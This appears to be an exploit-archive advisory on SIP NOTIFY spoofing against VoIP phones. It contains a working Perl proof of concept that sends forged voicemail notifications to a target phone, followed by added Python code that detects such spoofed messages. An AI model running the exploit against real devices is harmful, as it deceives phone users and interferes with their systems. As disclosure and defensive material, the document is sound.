Notify Message Spoofing Vulnerability With VoIP Phones (Exploit)

Summary

As reported earlier, many SIP implementations do not perform proper Caller-ID checks: a phone acts on an unsolicited NOTIFY on the strength of its From/Via headers alone, without verifying that the datagram came from the PBX it registered with. This allows an attacker to spoof various NOTIFY messages, such as call-waiting and voice-mail (message-summary) indications.
For more information see: Notify Message Spoofing Vulnerability With VoIP Phones

Credit:

The information has been provided by beSTORM.


Details

#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-07-08 17:49
# All Rights Reserved - Copyright (TM)
#
# Sends a single forged SIP NOTIFY (Event: message-summary) over UDP to the
# target phone, claiming to come from an Asterisk PBX at $attackedip.

use IO::Socket;
use Socket;      # PF_INET, SOCK_DGRAM, inet_aton, sockaddr_in
use strict;

my $target = shift;
my $print_usage = 0;

if (!$target)
{
    usage();

    print "No target has been supplied, reverting to 192.168.3.10.\n";
    $target = '192.168.3.10';
}

my $attackerip = shift;
if (!$attackerip)
{
    usage();

    print "Attacker IP address has not been supplied, reverting to 192.168.3.52.\n";
    $attackerip = '192.168.3.52';
}

my $attackedip = shift;
if (!$attackedip)
{
    usage();

    print "Contact IP address has not been supplied, reverting to 192.168.3.9.\n";
    $attackedip = '192.168.3.9';
}

print "Will attack $target.\n";
print "Attacker IP address defined as: $attackerip\n";
print "Attacked IP address defined as: $attackedip\n";

my $target_port = 5060;

# The heredoc interpolates; '@' must be escaped or Perl treats "\@$attackerip"
# as an array dereference. Each line ends in \r so the wire format is CRLF.
# The body (two lines, each CRLF-terminated) is 39 bytes.
my $packet =<<END;
NOTIFY sip:username:password\@$attackerip SIP/2.0\r
To: <sip:$attackedip:$target_port>\r
Via: SIP/2.0/UDP $attackedip:5060;branch=000000000000000\r
From: "asterisk" <sip:asterisk\@$attackedip>;tag=000000000\r
Contact: <sip:asterisk\@$attackerip>\r
Call-ID: 3121$attackedip\r
CSeq: 102 NOTIFY\r
User-Agent: Asterisk PBX\r
Event: message-summary\r
Content-Type: application/simple-message-summary\r
Max-Forwards: 70\r
Content-Length: 39\r
\r
Messages-Waiting: yes\r
Voicemail: 3/2\r
END

print "Sending: [$packet]\n";
print "Length: " . length($packet) . "\n";

# Plain UDP socket; the source address is whatever the kernel picks, the
# spoofing happens entirely in the SIP headers above.
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname('udp'))
    or die "cannot create socket: $!\n";

my $ipaddr = inet_aton($target) or die "cannot resolve $target\n";
my $sendto = sockaddr_in($target_port, $ipaddr);

send(PING, $packet, 0, $sendto) == length($packet)
    or die "cannot send to $target : $target_port : $!\n";

print "Done.\n";

sub usage
{
    if ($print_usage) { return; }
    $print_usage = 1;
    print ("#" x 50);
    print "\n";
    print "# $0 [hostname] [attackerip] [attackedip]\n";
    print "# hostname\t-\tThe host the packet will be sent to.\n";
    print "# attackerip\t-\tThe IP address from which the packet should be\n";
    print "\t\t\taddressed from (doesn't have to be your IP address).\n";
    print "# attackedip\t-\tThe IP address that you are contacting\n";
    print "\t\t\t(doesn't have to be the hostname IP's address).\n";
    print "\n";
    print "Results may vary depending on how the remote host handles packets.\n";
    print "For example:\n";
    print " * Some SIP Proxies won't look into packets addressed to it (attackedip or attackerip).\n";
    print " * Some SIP Routers won't handle packets that aren't addressed to it.\n";
    print "etc\n";
    print "\n";
}
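The origin check a phone, SBC or SIP-aware IDS should apply before acting on an unsolicited NOTIFY like the one above, as an added example that is not part of the advisory or of beSTORM's code: it parses the datagram, requires a message-summary NOTIFY to arrive from the configured PBX with a matching Via host, and verifies the declared Content-Length against the body. The IP addresses, the trusted-PBX set and the sample packet are constructed.

```python
import re

TRUSTED_PBX = {"192.0.2.10"}  # constructed: the only host allowed to send MWI

def parse_sip(raw: bytes):
    """Split a SIP datagram into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("utf-8", "replace").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def via_host(via: str) -> str:
    """Host from the top Via: 'SIP/2.0/UDP host:port;params'."""
    m = re.match(r"SIP/2\.0/\S+\s+([^\s:;]+)", via)
    return m.group(1) if m else ""

def check_notify(raw: bytes, src_ip: str, trusted=TRUSTED_PBX):
    """Return the reasons to reject (or alert on) this NOTIFY; [] means accept."""
    reqline, h, body = parse_sip(raw)
    if not reqline.startswith("NOTIFY "):
        return ["not a NOTIFY request"]
    reasons = []
    if h.get("event", "").lower() == "message-summary":
        # Unsolicited MWI must come from the PBX the phone registered with,
        # judged by the datagram source, not by what From/Contact claim.
        if src_ip not in trusted:
            reasons.append(f"message-summary NOTIFY from untrusted source {src_ip}")
        if via_host(h.get("via", "")) != src_ip:
            reasons.append("Via host does not match datagram source")
    declared = h.get("content-length", "")
    if not declared.isdigit() or int(declared) != len(body):
        reasons.append(f"Content-Length {declared!r} != body length {len(body)}")
    return reasons

# Constructed sample modelled on the advisory's packet: it claims to be the
# PBX at 192.0.2.10 but is actually sent from 192.0.2.52 (see the test call).
SPOOFED = (
    b"NOTIFY sip:user@192.0.2.52 SIP/2.0\r\nTo: <sip:192.0.2.20:5060>\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=000000000000000\r\n"
    b'From: "asterisk" <sip:asterisk@192.0.2.10>;tag=000000000\r\n'
    b"Call-ID: 3121192.0.2.10\r\nCSeq: 102 NOTIFY\r\nEvent: message-summary\r\n"
    b"Content-Type: application/simple-message-summary\r\nContent-Length: 37\r\n"
    b"\r\nMessages-Waiting: yes\r\nVoicemail: 3/2\r\n"
)
# The same NOTIFY as the real PBX would send it (correct length, right source).
LEGIT = SPOOFED.replace(b"Content-Length: 37", b"Content-Length: 39")
```

Run `check_notify(SPOOFED, "192.0.2.52")` to see all three findings; the same bytes from `192.0.2.10` with a correct Content-Length pass cleanly.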

Categories: Exploits